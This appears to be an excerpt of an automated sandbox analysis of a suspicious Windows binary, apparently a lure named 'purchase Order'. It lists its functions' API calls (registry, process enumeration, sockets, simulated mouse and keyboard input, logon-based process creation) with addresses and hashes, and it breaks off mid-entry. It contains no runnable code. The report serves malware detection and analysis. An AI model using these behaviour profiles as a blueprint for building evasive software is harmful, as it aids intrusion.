Opcode Fuzzy Hash: 6c54bb06f821be30e639c2f3e24e2e454296c786a4d77a0bca6e277db3311f13
Instruction Fuzzy Hash: CD21D835700618BBDB21AE658C86FDF7B68EF59710F008435FE5AEB181DB708D0597A1

Function 00CAA2C8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C5D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00C5D1BA
Part of subcall function 00C5D17C: GetStockObject.GDI32(00000011), ref: 00C5D1CE
Part of subcall function 00C5D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 00C5D1D8

SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00CAA32D
SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00CAA33A
SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00CAA345
SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00CAA354
SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00CAA360

Strings

Msctls_Progress32, xrefs: 00CAA2FE

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: MessageSend$CreateObjectStockWindow
String ID: Msctls_Progress32
API String ID: 1025951953-3636473452
Opcode ID: 05834a53e4101d4f2ff8b621760b7d8ef921c831af3f7fbada46c1ff5f823601
Instruction ID: 2472239360502ba21c8bbc4304513e133ed4487c85104b4d230765ce2cc0746c
Opcode Fuzzy Hash: 05834a53e4101d4f2ff8b621760b7d8ef921c831af3f7fbada46c1ff5f823601
Instruction Fuzzy Hash: 9C1190B115021ABEEF159F60CC85EEB7F6DFF09798F014114FA09A60A0C7729C21DBA4

Function 00C5CCCD Relevance: 9.3, APIs: 6, Instructions: 253COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C5CCF6
GetWindowRect.USER32(?,?), ref: 00C5CD37
ScreenToClient.USER32(?,?), ref: 00C5CD5F
GetClientRect.USER32(?,?), ref: 00C5CE8C
GetWindowRect.USER32(?,?), ref: 00C5CEA5

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Rect$Client$Window$Screen
String ID:
API String ID: 1296646539-0
Opcode ID: 1fde4a2bad56271da5fe8ded988a99f0ed3669e92582f822c423e7b9943a02ab
Instruction ID: 53f771a9b27c73475b2940c017e20bc8a27e5367921ddca0b9fe3214cc9a2374
Opcode Fuzzy Hash: 1fde4a2bad56271da5fe8ded988a99f0ed3669e92582f822c423e7b9943a02ab
Instruction Fuzzy Hash: 39B14A79900249DFDB10CFA9C4817EDB7B1FF08701F149529EC69EB250DB70AA94DB68

Function 00CA1BDF Relevance: 9.2, APIs: 6, Instructions: 163processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00CA1C18
Process32FirstW.KERNEL32(00000000,?), ref: 00CA1C26
__wsplitpath.LIBCMT ref: 00CA1C54

Part of subcall function 00C61DFC: __wsplitpath_helper.LIBCMT ref: 00C61E3C

_wcscat.LIBCMT ref: 00CA1C69
Process32NextW.KERNEL32(00000000,?), ref: 00CA1CDF
CloseHandle.KERNEL32(00000000,?,?,00000002,00000000), ref: 00CA1CF1

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath__wsplitpath_helper_wcscat
String ID:
API String ID: 1380811348-0
Opcode ID: aadaa85f8d0d213ac62cee2b7043037df22fd33e78f52ca16245cadf03270e42
Instruction ID: 1c79e5cb019e46e06564816870c5de5b4170b079b326e448c48e7f93be64ac8b
Opcode Fuzzy Hash: aadaa85f8d0d213ac62cee2b7043037df22fd33e78f52ca16245cadf03270e42
Instruction Fuzzy Hash: 9B517E715043019FD720EF64C885FAFB7E8EF89754F04492EF98697261EB70AA04DB92

Function 00CA2FD6 Relevance: 9.2, APIs: 6, Instructions: 160registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CA2BB5,?,?), ref: 00CA3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CA30AF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00CA30EF
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00CA3112
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00CA313B
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CA317E
RegCloseKey.ADVAPI32(00000000), ref: 00CA318B

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue
String ID:
API String ID: 3451389628-0
Opcode ID: d6be83e30e03e3ff694b1e11beb2439636197044d6e2ad01e399715e84bc0bdc
Instruction ID: f2ca8f9ef6bb6fa869d171d75c4a4c05777cfa6481ce959a27542ee8a315d005
Opcode Fuzzy Hash: d6be83e30e03e3ff694b1e11beb2439636197044d6e2ad01e399715e84bc0bdc
Instruction Fuzzy Hash: 7C514931104341AFC704EF64C895E6EBBE9FF89304F04492DFA56872A1DB71EA05DB52

Function 00CA84DE Relevance: 9.2, APIs: 6, Instructions: 152windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00CA8540
GetMenuItemCount.USER32(00000000), ref: 00CA8577
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00CA859F
GetMenuItemID.USER32(?,?), ref: 00CA860E
GetSubMenu.USER32(?,?), ref: 00CA861C
PostMessageW.USER32(?,00000111,?,00000000), ref: 00CA866D

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: dad8bde575729414f0a3754e01790573ab9280520095ce8a11b27f6111690b61
Instruction ID: c3c3a3c439a32c4d6887e0cc07d27f9df4bcd0818d26d16a156c663ceadc4023
Opcode Fuzzy Hash: dad8bde575729414f0a3754e01790573ab9280520095ce8a11b27f6111690b61
Instruction Fuzzy Hash: 8151BB31E00226AFDB11EFA4C841AAEB7F4FF49314F1044A9F916BB351CB30AE459B94

Function 00C84AC2 Relevance: 9.1, APIs: 6, Instructions: 136windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C84B10
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C84B5B
IsMenu.USER32(00000000), ref: 00C84B7B
CreatePopupMenu.USER32 ref: 00C84BAF
GetMenuItemCount.USER32(000000FF), ref: 00C84C0D
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00C84C3E

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: a378deadfcb837046f44bd04429e00c97e68f9d3cc8964a7b9c1f980e1a32e60
Instruction ID: 720e89c4e1ade0c070fca6c33f3fad8b7199e69f17535adbecf590c944d0271c
Opcode Fuzzy Hash: a378deadfcb837046f44bd04429e00c97e68f9d3cc8964a7b9c1f980e1a32e60
Instruction Fuzzy Hash: 3E51D47060130AEFDF28EF64D888BADBBF9BF4431CF144169E4259B291D3709A44CB59

Function 00C98DE2 Relevance: 9.1, APIs: 6, Instructions: 136networkCOMMON

Download Yara Rule

APIs

select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,00CDDC00), ref: 00C98E7C
WSAGetLastError.WSOCK32(00000000), ref: 00C98E89
__WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 00C98EAD
#16.WSOCK32(?,?,00000000,00000000), ref: 00C98EC5
_strlen.LIBCMT ref: 00C98EF7
WSAGetLastError.WSOCK32(00000000), ref: 00C98F6A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: ErrorLast$_strlenselect
String ID:
API String ID: 2217125717-0
Opcode ID: 801defa4c0da10e01b8b8380b6c7701385e524d423a69d8e3a152859fa29f043
Instruction ID: 9bba2df814be9b1e20e6819862254a3daec46a84221c4242b0e0e30108824b6f
Opcode Fuzzy Hash: 801defa4c0da10e01b8b8380b6c7701385e524d423a69d8e3a152859fa29f043
Instruction Fuzzy Hash: 0641A071900204ABCB14EBA4CD99FAEB7B9EF49314F104669F51A97291DF30EE44DB60

Function 00C5ABF5 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00C5B34E: GetWindowLongW.USER32(?,000000EB), ref: 00C5B35F

BeginPaint.USER32(?,?,?), ref: 00C5AC2A
GetWindowRect.USER32(?,?), ref: 00C5AC8E
ScreenToClient.USER32(?,?), ref: 00C5ACAB
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00C5ACBC
EndPaint.USER32(?,?,?,?,?), ref: 00C5AD06
Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00CBE673

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
String ID:
API String ID: 2592858361-0
Opcode ID: 37888f9a3d7cb2172af8bdb13636c8ffc4764810dd1014d2d947087c57d95ad2
Instruction ID: 4b94215b71f64087c33f2ed5a7c043e5db6a7856b16daadc3f3deef3cb109464
Opcode Fuzzy Hash: 37888f9a3d7cb2172af8bdb13636c8ffc4764810dd1014d2d947087c57d95ad2
Instruction Fuzzy Hash: 5B41AF74104301AFC710DF25CC84FBA7BF8EB59721F140769F9A9872A1C732A988DB66

Function 00C898BA Relevance: 9.1, APIs: 6, Instructions: 100fileCOMMON

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00C898D1

Part of subcall function 00C5F4EA: std::exception::exception.LIBCMT ref: 00C5F51E
Part of subcall function 00C5F4EA: __CxxThrowException@8.LIBCMT ref: 00C5F533

ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00C89908
EnterCriticalSection.KERNEL32(?), ref: 00C89924
LeaveCriticalSection.KERNEL32(?), ref: 00C8999E
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00C899B3
InterlockedExchange.KERNEL32(?,000001F6), ref: 00C899D2

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
String ID:
API String ID: 2537439066-0
Opcode ID: 03242fd12a6df69ebe3203b83bcd808a9e1d15c7148916abe660c0e5cd66f290
Instruction ID: 043a75a2953db307bf80a5588aa07983b50d5e5cdca9882265e6e07cbfd98a15
Opcode Fuzzy Hash: 03242fd12a6df69ebe3203b83bcd808a9e1d15c7148916abe660c0e5cd66f290
Instruction Fuzzy Hash: 77318F31A00105ABDB10AFA4DC85EAEBB78FF84311B1480B9F905AB246E770DE55DBA5

Function 00C99B45 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00C977F4,?,?,00000000,00000001), ref: 00C99B53

Part of subcall function 00C96544: GetWindowRect.USER32(?,?), ref: 00C96557

GetDesktopWindow.USER32 ref: 00C99B7D
GetWindowRect.USER32(00000000), ref: 00C99B84
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00C99BB6

Part of subcall function 00C87A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00C87AD0

GetCursorPos.USER32(?), ref: 00C99BE2
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00C99C44

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: 0f6d3cfac8a2a66673175abae3827185828bb68018000a6432d0e7b2e70c82e0
Instruction ID: f73558c9131cfca4cce8fed2a1a416c85057e16d9335290ccc542f257d7cc10c
Opcode Fuzzy Hash: 0f6d3cfac8a2a66673175abae3827185828bb68018000a6432d0e7b2e70c82e0
Instruction Fuzzy Hash: C631CFB2104315ABCB20DF58DC49F9AB7E9FF88314F00092AF599E7191DA31EA44CB92

Function 00C7AF64 Relevance: 9.1, APIs: 6, Instructions: 73processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C7AFAE
OpenProcessToken.ADVAPI32(00000000), ref: 00C7AFB5
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C7AFC4
CloseHandle.KERNEL32(00000004), ref: 00C7AFCF
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C7AFFE
DestroyEnvironmentBlock.USERENV(00000000), ref: 00C7B012

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 170f0e6621df24e6f009dd29902348cca561b26ec6f5451e7ad6ee8280c46cf6
Instruction ID: e11b1644d2978c97b92a3922a73a07ac21909d4e31d3e79f88bf97e4ade7a1c5
Opcode Fuzzy Hash: 170f0e6621df24e6f009dd29902348cca561b26ec6f5451e7ad6ee8280c46cf6
Instruction Fuzzy Hash: 9921507210520DAFDF028FA8DD09FAE7BA9EF84304F048025FA06A2161C3769E51EB61

Function 00CAEBF6 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00C5AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00C5AFE3
Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5AFF2
Part of subcall function 00C5AF83: BeginPath.GDI32(?), ref: 00C5B009
Part of subcall function 00C5AF83: SelectObject.GDI32(?,00000000), ref: 00C5B033

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00CAEC20
LineTo.GDI32(00000000,00000003,?), ref: 00CAEC34
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00CAEC42
LineTo.GDI32(00000000,00000000,?), ref: 00CAEC52
EndPath.GDI32(00000000), ref: 00CAEC62
StrokePath.GDI32(00000000), ref: 00CAEC72

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: 2b85cf4462319679e0249e32dc98a7df5ed2cc2447aaa5f255f2a539b844e5fa
Instruction ID: 39a31c685f819cfd1c8546ce3267c65368c2bb4a708983d1c047e754c507fb8d
Opcode Fuzzy Hash: 2b85cf4462319679e0249e32dc98a7df5ed2cc2447aaa5f255f2a539b844e5fa
Instruction Fuzzy Hash: 9F110576000149BFEB029F94DD88FEA7FADEB08364F048126FE198A160D7719E55DBA0

Function 00C7E19B Relevance: 9.0, APIs: 6, Instructions: 48COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00C7E1C0
GetDeviceCaps.GDI32(00000000,00000058), ref: 00C7E1D1
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00C7E1D8
ReleaseDC.USER32(00000000,00000000), ref: 00C7E1E0
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00C7E1F7
MulDiv.KERNEL32(000009EC,?,?), ref: 00C7E209

Part of subcall function 00C79AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00C79A05,00000000,00000000,?,00C79DDB), ref: 00C7A53A

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: CapsDevice$ExceptionRaiseRelease
String ID:
API String ID: 603618608-0
Opcode ID: f03d1c9bcd40202cc744951eb8a81c777fe806e5b2dfdb65d008d4b4e8f8ab6d
Instruction ID: 2984f4c4d16b497c4b7c00f800acd78d144fa6ff41e55bac89c9dff6242a3f08
Opcode Fuzzy Hash: f03d1c9bcd40202cc744951eb8a81c777fe806e5b2dfdb65d008d4b4e8f8ab6d
Instruction Fuzzy Hash: B40184B5A00614BFEB109FA5CC45F5EBFB8EB48351F008066FA09A7291D6709D01CB60

Function 00C67B47 Relevance: 9.0, APIs: 6, Instructions: 45threadCOMMON

Download Yara Rule

APIs

__init_pointers.LIBCMT ref: 00C67B47

Part of subcall function 00C6123A: __initp_misc_winsig.LIBCMT ref: 00C6125E
Part of subcall function 00C6123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00C67F51
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C67F65
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C67F78
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C67F8B
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C67F9E
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00C67FB1
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00C67FC4
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00C67FD7
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00C67FEA
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00C67FFD
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00C68010
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00C68023
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00C68036
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00C68049
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00C6805C
Part of subcall function 00C6123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 00C6806F

__mtinitlocks.LIBCMT ref: 00C67B4C

Part of subcall function 00C67E23: InitializeCriticalSectionAndSpinCount.KERNEL32(00CFAC68,00000FA0,?,?,00C67B51,00C65E77,00CF6C70,00000014), ref: 00C67E41

__mtterm.LIBCMT ref: 00C67B55

Part of subcall function 00C67BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00C67B5A,00C65E77,00CF6C70,00000014), ref: 00C67D3F
Part of subcall function 00C67BBD: _free.LIBCMT ref: 00C67D46
Part of subcall function 00C67BBD: DeleteCriticalSection.KERNEL32(00CFAC68,?,?,00C67B5A,00C65E77,00CF6C70,00000014), ref: 00C67D68

__calloc_crt.LIBCMT ref: 00C67B7A
GetCurrentThreadId.KERNEL32 ref: 00C67BA3

Memory Dump Source

Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true

Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd

Similarity

API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
String ID:
API String ID: 2942034483-0
Opcode ID: 8cf974de6d7a41c9269d15b31e7525eb9d2232ebdb77907acf007a4321a4bced
Instruction ID: 1330bf5874eed27467c1d49a840b9174cfc389fe207415c3d054409de3c4ac2e
Opcode Fuzzy Hash: 8cf974de6d7a41c9269d15b31e7525eb9d2232ebdb77907acf007a4321a4bced
Instruction Fuzzy Hash: 8BF0903211D7121EEA387B747CC6B5A27849F41B7CB340FA9F874D51E2FF218941A161

Function 00C427EC Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00C4281D
MapVirtualKeyW.USER32(00000010,00000000), ref: 00C42825
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00C42830
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00C4283B
MapVirtualKeyW.USER32(00000011,00000000), ref: 00C42843
MapVirtualKeyW.USER32(00000012,00000000), ref: 00C4284B

Memory Dump Source

